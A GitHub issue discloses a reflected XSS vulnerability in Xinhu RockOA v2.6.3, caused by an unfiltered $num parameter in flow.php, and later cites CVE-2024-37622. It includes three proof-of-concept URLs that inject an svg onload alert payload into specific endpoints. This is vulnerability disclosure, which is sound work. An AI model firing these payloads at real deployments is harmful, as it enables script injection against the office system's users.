search

rainrocka / xinhu

信呼,免费开源的办公OA系统,包括APP,pc上客户端,REIM即时通信,服务端等,让每个企业单位都有自己的办公系统。
http://www.rockoa.com/
95 stars 21 forks source link

Reflected XSS Vulnerability in Xinhu RockOA v2.6.3 #4

Open Hebing123 opened 1 month ago

Hebing123 commented 1 month ago

Summary

A Reflected Cross-Site Scripting (XSS) vulnerability has been identified in the Xinhu RockOA v2.6.3.

Details

The XSS vulnerability originates from /webmain/model/flow/flow.php:

if(!$this->moders)$this->echomsg('模块['.$num.']不存在,请到[流程模块列表]下添加'); }

https://github.com/rainrocka/xinhu/blob/7a6debc029c7332756cc3cc75c7faba69639eb89/webmain/model/flow/flow.php#L8 Since $num is not filtered,which leads to XSS vulnerability across multiple endpoints.

Proof of Concept (PoC)

http(s)://ip:port/index.php?a=getselectdata&act=city:citydata&actstr=Y2l0eTpjaXR5ZGF0YQ::&acttyle=act&ajaxbool=true&d=flow&limit=100&m=mode_customer%7Cinput&page=1&rnd=969497&sysmid=0&sysmodenum=customer%3Csvg%20onload=alert(1)%3E ... http(s)://ip:port/task.php?a=p&callback=&mid=5&num=finfybx%3Csvg/onload=alert(1)%3E ... http(s)://ip:port/?a=lu&callback=homebsbianjback&d=flow&m=input&mid=0&num=bianjian%3Csvg%20onload=alert(1)%3E

image

Hebing123 commented 1 week ago

CVE-2024-37622